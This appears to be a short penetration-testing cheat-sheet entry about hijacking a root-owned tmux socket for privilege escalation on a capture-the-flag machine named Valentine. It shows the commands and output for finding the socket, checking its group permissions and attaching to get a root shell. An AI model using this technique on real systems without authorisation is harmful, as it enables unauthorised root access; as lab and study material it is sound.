5 privesc tmux

Hijacking Tmux

# check for running tmux session by root
hype@Valentine:~$ ps aux | grep tmux
root       1029  0.0  0.1  26416  1672 ?        Ss   12:59   0:00 /usr/bin/tmux -S /.devs/dev_sess
hype      22736  0.0  0.0  13576   924 pts/0    S+   13:50   0:00 grep --color=auto tmux

# can we write to that file - YES!
hype@Valentine:~$ ls -la /.devs/dev_sess
srw-rw---- 1 root hype 0 May  6 12:59 /.devs/dev_sess

hype@Valentine:~$ tmux -S /.devs/dev_sess
root@Valentine:/home/hype# whoami;id
root
uid=0(root) gid=0(root) groups=0(root)
[exited]

Last updated